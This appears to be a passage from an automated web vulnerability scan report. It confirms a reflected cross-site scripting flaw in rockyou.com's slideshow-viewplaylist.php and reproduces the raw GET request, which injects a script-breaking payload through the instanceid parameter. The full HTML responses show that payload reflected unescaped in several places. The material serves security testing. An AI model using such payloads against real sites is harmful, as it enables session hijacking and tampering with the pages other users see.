slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="js/embeds.js?ver=4" type="text/javascript"></script><script src="js/music-embeds.js?ver=1" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
</HEAD>
<BODY class=""
style="background-image: url(/images/menu-bg.gif); background-repeat: repeat-x;"
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initPage();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="display:block;width:840px;height:68px;border:0px;position:relative;">
<a href="/index.php"><img src="/images/logo-menutop-rockyou.gif" alt=""></a>
<table cellpadding="1" cellspacing="0" style="position:absolute;top:0px;left:107px;"><tr>
<td style="font-size:15px"><a class="mainmenu" href="/choose_widget.php">Create</a> | </td>
<td style="font-size:15px"><a class="mainmenu" href="/my_stuff.php">My Stuff</a> | </td>
<td style="font-size:15px"><a class="mainmenu" href="/featuredartists.php">Browse</a></td>
</tr></table>
<img src="/images/index_tab.gif" style="position:absolute;top:0px;left:620px">
<div style="position:absolute;top:5px;left:630px;font-size:11px;font-family:arial;width:200px;text-align:center;">
<a href="http://www.rockyou.com/login/" style="color: white;">login / register</a> </div>
</div>
<div style="position:absolute;top:24;left:628;">
<form method="get" action="/search_main.php">
<table class="search" id="search_box"><tr><td>
<input type="text" name="s_tsearch" size=17 style="border:2px solid #6388c2"/></td>
<td><input type="submit" value="search" />
</td></tr></table> <input type="hidden" value="1" name="p" /></form>
</div>
<script>
var thisinstanceid = '117242930';
membed = new musicEmbed(-1);
var curSong = -1;
function initPage()
{
//refreshMusic(-1);
embed = new appEmbed(thisinstanceid);
embed.noSound=true;
embed.insertEmbed("viewslideshow");
embed.setPixelSize(300,200);
}
function refreshMusic(id)
{
membed.insertEmbed('music-player');
}
function previewSong(url,cnt)
{
if (membed.songUrl!=url)
{
membed.songUrl=url;
document.getElementById('playicon-'+cnt).src='/images/icon-stopbig.gif';
if (curSong >= 0) document.getElementById('playicon-'+curSong).src='/images/icon-playbig.gif';
}
else
{
if (membed.songUrl==url)
{
document.getElementById('playicon-'+cnt).src='/images/icon-playbig.gif';
}
membed.songUrl="";
curSong=-1;
}
membed.stop = false;
curSong = cnt;
refreshMusic(-1);
}
function loadingSong()
{
}
function CopyToClipboard()
{
var e = document.getElementById("slidecontent");
e.focus();
e.select();
document.selection.createRange().execCommand("Copy");
}
</script>
<table><tr><td valign="top" >
<div style="position:relative">
<div id="viewslideshow" style="margin-left: 10px; border:1px solid #cccccc;"></div>
</div>
<div style="float:right;display:inline"><a href="show_my_gallery.php?instanceid=117242930">View Full Show</a></div>
<div style="clear:both"></div>
<div style="background-color:#e9e8e8;border:solid #aaa 1px;width:340px;margin-top:10px;margin-left:11px;padding-top:3px" align="center">
<strong>Embed Code</strong><br />
<textarea id="slidecontent" wrap="hard" onClick="this.focus(); this.select();" style="margin:2px auto 5px auto;border: solid 1px #aaa;background:#fff;font-size:12px;font-family:Arial, Helvetica, sans-serif; height:50; color:#666; width: 300px; overflow:hidden;"><embed src="http://apps.rockyou.com/rockyou.swf?instanceid=117242930" quality="high" wmode="transparent" width="426" height="320" flashvars="appWidth=325&appHeight=244" name="slideshowpreview" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"/><br><img src="http://apps.rockyou.com/dot.gif"><a target="_BLANK" href="http://www.rockyou.com?type=slideshow&refid=117242930"><img title="RockYou slideshow" src="http://apps.rockyou.com/images/logo-mini.gif" border="0"></a> <a target="_BLANK" href="http://www.rockyou.com/slideshow-create.php?source=cyo&refid=117242930">Create Your Own</a><a style="padding-right:0px;" target="_BLANK" href=" http://www.rockyou.com/slideshow-viewplaylist.php?instanceid=117242930"><img style="border:0px;" src="http://apps.rockyou.com/images/tail_playlist.gif "></a></textarea>
<br />
<a href="javascript: CopyToClipboard();"><img src="images/rockyou_music-copybutton.jpg" style="margin-bottom:7px" /></a>
<!--br><center><a onclick="urchinTracker ('/links/viewplaylist/slideshowcreate')" href="/slideshow-create.php?source=svp"><img src="/images/button-createslideshow-big.gif"></a></center1-->
</td><td valign="top">
<div style="font-weight: bold; font-size:24px;font-family: arial;">
<img src='images/rockyou_music-banner.jpg'>
<p style="margin:10px 0px 0px 0px;">Song Playlist</div>
<table width='450px'><tr style='background-color:#e9e8e8;'><td>1</td><td style='width: 80px; height:80px;'><div style='position:relative'><a href='javascript:previewSong("http://apps.rockyou.com/music/0/0/4/492.mp3",1);'><img height='80' src='http://apps.rockyou.com/images/spacer.gif'><img id='playicon-1' style='position:absolute;left:20px;top:20px;' src='/images/icon-playbig.gif'></a></div></td><td><b style='font-size: 18px;'>Chicken Fried</b><br>Zac Brown Band<br /><br /><a onclick='urchinTracker("/links/viewplaylist/492");' href='/music/music_slideshow_create.php?songid=492'>Get This Song in a Slideshow</a></td></tr></table><div style='text-align:right;margin-top:5px;'>
<img src="/images/logos/snocap.png" style="border:1px solid #CCCCCC">
<img src="/images/bebo-bands-logo.jpg" style="border:1px solid #CCCCCC">
<img src="/images/logo-nettwerk.jpg" style="border:1px solid #CCCCCC">
<img src="/images/logo-pumpaudio.jpg" style="border:1px solid #CCCCCC">
</div>
</td></tr></table><div id='music-player'></div>
<div style='position: absolute; left: 850px; top: 0px; width: 160px;'>
</div>
<style>
.footmenublk:link {font-family:Arial;color:#f26522;font-size: 10px;font-weight:bold;text-decoration:underline;}
.footmenublk:visited {font-family:Arial;color:#f26522;font-size: 10px;font-weight:bold;text-decoration:underline;}
.footmenublk:active {font-family:Arial;color:#f26522;font-size: 10px;font-weight:bold;text-decoration:underline;}
.footmenublk:hover {font-family:Arial;color:#f26522;font-size: 10px;font-weight:bold;text-decoration:underline;}
</style>
<br><br>
<div class="tp"><span style="color:#CCCCCC">
Copyright © 2007 RockYou | <a target="_BLANK" href="/help" class="footmenublk">FAQ / Help</a> | <a target="_BLANK" href="/privacypolicy.php" class="footmenublk">Privacy</a> | <a href="/tos.php" target=_blank class="footmenublk">Terms of Use</a> | <a href="/corp/facebook/ad.php" target="_blank" class="footmenublk">Facebook Advertisers</a> | <a href="/corp/facebook/dev.php" target="_blank" class="footmenublk">Facebook Developers</a> | <a href="/corp/about.php" target=_blank class="footmenublk">About Us</a></span></div>
<div class="tp">
| <a href="?lang=en&instanceid=117242930&nsextt='"--></style></script><script>netsparker(0x000FF6)</script>" class="footmenublk">English</a> | <a href="?lang=zh&instanceid=117242930&nsextt='"--></style></script><script>netsparker(0x000FF6)</script>" class="footmenublk">中文</a> | <a href="?lang=es&instanceid=117242930&nsextt='"--></style></script><script>netsparker(0x000FF6)</script>" class="footmenublk">Español | <a href="?lang=pt&instanceid=117242930&nsextt='"--></style></script><script>netsparker(0x000FF6)</script>" class="footmenublk">Português</a></a>
</div>
<br>
<br>
<script language="javascript">
if (navigator.cookieEnabled && document.cookie.indexOf('AAMBLFLAG=') == -1) {
var blTomorrow = new Date();
blTomorrow.setTime(blTomorrow.getTime() + 86400000);
document.cookie = 'AAMBLFLAG=SET; expires=' + blTomorrow.toGMTString();
if (document.cookie.indexOf('AAMBLFLAG=') > -1)
document.writeln('<iframe src="http://aps.media..
|
- /slideshow-viewplaylist.php
/slideshow-viewplaylist.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| instanceid | GET | 117242930�'"--></style></script><script>alert(0x00107F)</script> |
Request
GET /slideshow-viewplaylist.php?instanceid=117242930%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00107F)%3C%2Fscript%3E HTTP/1.1
Referer: http://www.rockyou.com/featuredartists.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164738; ctid=1; sns_type=rockyou.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/featuredartists.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164738; ctid=1; sns_type=rockyou.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:12:18 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:12:17 GMT; path=/; domain=.rockyou.com,lastlogin=1303164738; expires=Wed, 27-Jul-2011 22:12:18 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:12:18 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=30861 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 4697
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="js/embeds.js?ver=4" type="text/javascript"></script><script src="js/music-embeds.js?ver=1" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
</HEAD>
<BODY class=""
style="background-image: url(/images/menu-bg.gif); background-repeat: repeat-x;"
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initPage();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="display:block;width:840px;height:68px;border:0px;position:relative;">
<a href="/index.php"><img src="/images/logo-menutop-rockyou.gif" alt=""></a>
<table cellpadding="1" cellspacing="0" style="position:absolute;top:0px;left:107px;"><tr>
<td style="font-size:15px"><a class="mainmenu" href="/choose_widget.php">Create</a> | </td>
<td style="font-size:15px"><a class="mainmenu" href="/my_stuff.php">My Stuff</a> | </td>
<td style="font-size:15px"><a class="mainmenu" href="/featuredartists.php">Browse</a></td>
</tr></table>
<img src="/images/index_tab.gif" style="position:absolute;top:0px;left:620px">
<div style="position:absolute;top:5px;left:630px;font-size:11px;font-family:arial;width:200px;text-align:center;">
<a href="http://www.rockyou.com/login/" style="color: white;">login / register</a> </div>
</div>
<div style="position:absolute;top:24;left:628;">
<form method="get" action="/search_main.php">
<table class="search" id="search_box"><tr><td>
<input type="text" name="s_tsearch" size=17 style="border:2px solid #6388c2"/></td>
<td><input type="submit" value="search" />
</td></tr></table> <input type="hidden" value="1" name="p" /></form>
</div>
<script>
var thisinstanceid = '117242930�'"--></style></script><script>netsparker(0x00107F)</script>';
membed = new musicEmbed(-1);
var curSong = -1;
function initPage()
{
//refreshMusic(-1);
embed = new appEmbed(thisinstanceid);
embed.noSound=true;
embed.insertEmbed("viewslideshow");
embed.setPixelSize(300,200);
}
function refreshMusic(id)
{
membed.insertEmbed('music-player');
}
function previewSong(url,cnt)
{
if (membed.songUrl!=url)
{
membed.songUrl=url;
document.getElementById('playicon-'+cnt).src='/images/icon-stopbig.gif';
if (curSong >= 0) document.getElementById('playicon-'+curSong).src='/images/icon-playbig.gif';
}
else
{
if (membed.songUrl==url)
{
document.getElementById('playicon-'+cnt).src='/images/icon-playbig.gif';
}
membed.songUrl="";
curSong=-1;
}
membed.stop = false;
curSong = cnt;
refreshMusic(-1);
}
function loadingSong()
{
}
function CopyToClipboard()
{
var e = document.getElementById("slidecontent");
e.focus();
e.select();
document.selection.createRange().execCommand("Copy");
}
</script>
<table><tr><td valign="top" >
<div style="position:relative">
<div id="viewslideshow" style="margin-left: 10px; border:1px solid #cccccc;"></div>
</div>
<div style="float:right;display:inline"><a href="show_my_gallery.php?instanceid=117242930�'"--></style></script><script>netsparker(0x00107F)</script>">View Full Show</a></div>
<div style="clear:both"></div>
<div style="background-color:#e9e8e8;border:solid #aaa 1px;width:340px;margin-top:10px;margin-left:11px;padding-top:3px" align="center">
<strong>Embed Code</strong><br />
<textarea id="slidecontent" wrap="hard" onClick="this.focus(); this.select();" style="margin:2px auto 5px auto;border: solid 1px #aaa;background:#fff;font-size:12px;font-family:Arial, Helvetica, sans-serif; height:50; color:#666; width: 300px; overflow:hidden;"><embed src="http://apps.rockyou.com/rockyou.swf?instanceid=117242930�'"--></style></script><script>netsparker(0x00107F)</script>" quality="high" wmode="transparent" width="426" height="320" flashvars="appWidth=325&appHeight=244" name="slideshowpreview" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"/><br><img src="http://apps.rockyou.com/dot.gif"><a target="_BLANK" href="http://www.rockyou.com?type=slideshow&refid=117242930�'"--></style></script><script>netsparker(0x00107F)</script>"><img title="RockYou slideshow" src="http://apps.rockyou.com/images/logo-mini.gif" border="0"></a> <a target="_BLANK" href="http://www.rockyou.com/slideshow-create.php?source=cyo&refid=117242930�'"--></style></script><script>netsparker(0x00107F)</script>">Create Your Own</a><a style="padding-right:0px;" target="_BLANK" href=" http://www.rockyou.com/slideshow-viewplaylist.php?instanceid=117242930�'"--></style></script><script>netsparker(0x00107F)</script>"><img style="border:0px;" src="http://apps.rockyou.com/images/tail_playlist.gif "></a></textarea>
<br />
<a href="javascript: CopyToClipboard();"><img src="images/rockyou_music-copybutton.jpg" style="margin-bottom:7px" /></a>
<!--br><center><a onclick="urchinTracker ('/links/viewplaylist/slideshowcreate')" href="/slideshow-create.php?source=svp"><img src="/images/button-createslideshow-big.gif"></a></center1-->
</td><td valign="top">
<div style="font-weight: bold; font-size:24px;font-family: arial;">
<img src='images/rockyou_music-banner.jpg'>
<p style="margin:10px 0px 0px 0px;">Song Playlist</div>
<table width='450px'><tr style='background-color:#e9e8e8;'><td>1</td><td style='width: 80px; height:80px;'><div style='position:relative'><a href='javascript:previewSong("http://apps.rockyou.com/music/0/0/4/492.mp3",1);'><img height='80' src='http://apps.rockyou.com/images/spacer.gif'><img id='playicon-1' style='position:absolute;left:20px;top:20px;' src='/images/icon-playbig.gif'></a></div></td><td><b style='font-size: 18px;'>Chicken Fried</b><br>Zac Brown Band<br /><br /><a onclick='urchinTracker("/links/viewplaylist/492");' href='/music/music_slideshow_create.php?songid=492'>Get This Song in a Slideshow</a></td></tr></table><div style='text-align:right;margin-top:5px;'>
<img src="/images/logos/snocap.png" style="border:1px solid #CCCCCC">
<img src="/images/bebo-bands-logo.jpg" style="border:1px solid #CCCCCC">
<img src="/images/logo-nettwerk.jpg" style="border:1px solid #CCCCCC">
<img src="/images/logo-pumpaudio.jpg" style="border:1px solid #CCCCCC">
</div>
</td></tr></table><div id='music-player'></div>
<div style='position: absolute; left: 850px; top: 0px; width: 160px;'>
</div>
<style>
.footmenublk:link {font-family:Arial;color:#f26522;font-size: 10px;font-weight:bold;text-decoration:underline;}
.footmenublk:visited {font-family:Arial;color:#f26522;font-size: 10px;font-weight:bold;text-decoration:underline;}
.footmenublk:active {font-family:Arial;color:#f26522;font-size: 10px;font-weight:bold;text-decoration:underline;}
.footmenublk:hover {font-family:Arial;color:#f26522;font-size: 10px;font-weight:bold;text-decoration:underline;}
</style>
<br><br>
<div class="tp"><span style="color:#CCCCCC">
Copyright © 2007 RockYou | <a target="_BLANK" href="/help" class="footmenublk">FAQ / Help</a> | <a target="_BLANK" href="/privacypolicy.php" class="footmenublk">Privacy</a> | <a href="/tos.php" target=_blank class="footmenublk">Terms of Use</a> | <a href="/corp/facebook/ad.php" target="_blank" class="footmenublk">Facebook Advertisers</a> | <a href="/corp/facebook/dev.php" target="_blank" class="footmenublk">Facebook Developers</a> | <a href="/corp/about.php" target=_blank class="footmenublk">About Us</a></span></div>
<div class="tp">
| <a href="?lang=en&instanceid=117242930�'"--></style></script><script>netsparker(0x00107F)</script>" class="footmenublk">English</a> | <a href="?lang=zh&instanceid=117242930�'"--></style></script><script>netsparker(0x00107F)</script>" class="footmenublk">中文</a> | <a href="?lang=es&instanceid=117242930�'"--></style></script><script>netsparker(0x00107F)</script>" class="footmenublk">Español | <a href="?lang=pt&instanceid=117242930�'"--></style></script><script>netsparker(0x00107F)</script>" class="footmenublk">Português</a></a>
</div>
<br>
<..
Date: Mon, 18 Apr 2011 22:12:18 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:12:17 GMT; path=/; domain=.rockyou.com,lastlogin=1303164738; expires=Wed, 27-Jul-2011 22:12:18 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:12:18 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=30861 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 4697
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="js/embeds.js?ver=4" type="text/javascript"></script><script src="js/music-embeds.js?ver=1" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
</HEAD>
<BODY class=""
style="background-image: url(/images/menu-bg.gif); background-repeat: repeat-x;"
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initPage();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="display:block;width:840px;height:68px;border:0px;position:relative;">
<a href="/index.php"><img src="/images/logo-menutop-rockyou.gif" alt=""></a>
<table cellpadding="1" cellspacing="0" style="position:absolute;top:0px;left:107px;"><tr>
<td style="font-size:15px"><a class="mainmenu" href="/choose_widget.php">Create</a> | </td>
<td style="font-size:15px"><a class="mainmenu" href="/my_stuff.php">My Stuff</a> | </td>
<td style="font-size:15px"><a class="mainmenu" href="/featuredartists.php">Browse</a></td>
</tr></table>
<img src="/images/index_tab.gif" style="position:absolute;top:0px;left:620px">
<div style="position:absolute;top:5px;left:630px;font-size:11px;font-family:arial;width:200px;text-align:center;">
<a href="http://www.rockyou.com/login/" style="color: white;">login / register</a> </div>
</div>
<div style="position:absolute;top:24;left:628;">
<form method="get" action="/search_main.php">
<table class="search" id="search_box"><tr><td>
<input type="text" name="s_tsearch" size=17 style="border:2px solid #6388c2"/></td>
<td><input type="submit" value="search" />
</td></tr></table> <input type="hidden" value="1" name="p" /></form>
</div>
<script>
var thisinstanceid = '117242930�'"--></style></script><script>netsparker(0x00107F)</script>';
membed = new musicEmbed(-1);
var curSong = -1;
function initPage()
{
//refreshMusic(-1);
embed = new appEmbed(thisinstanceid);
embed.noSound=true;
embed.insertEmbed("viewslideshow");
embed.setPixelSize(300,200);
}
function refreshMusic(id)
{
membed.insertEmbed('music-player');
}
function previewSong(url,cnt)
{
if (membed.songUrl!=url)
{
membed.songUrl=url;
document.getElementById('playicon-'+cnt).src='/images/icon-stopbig.gif';
if (curSong >= 0) document.getElementById('playicon-'+curSong).src='/images/icon-playbig.gif';
}
else
{
if (membed.songUrl==url)
{
document.getElementById('playicon-'+cnt).src='/images/icon-playbig.gif';
}
membed.songUrl="";
curSong=-1;
}
membed.stop = false;
curSong = cnt;
refreshMusic(-1);
}
function loadingSong()
{
}
function CopyToClipboard()
{
var e = document.getElementById("slidecontent");
e.focus();
e.select();
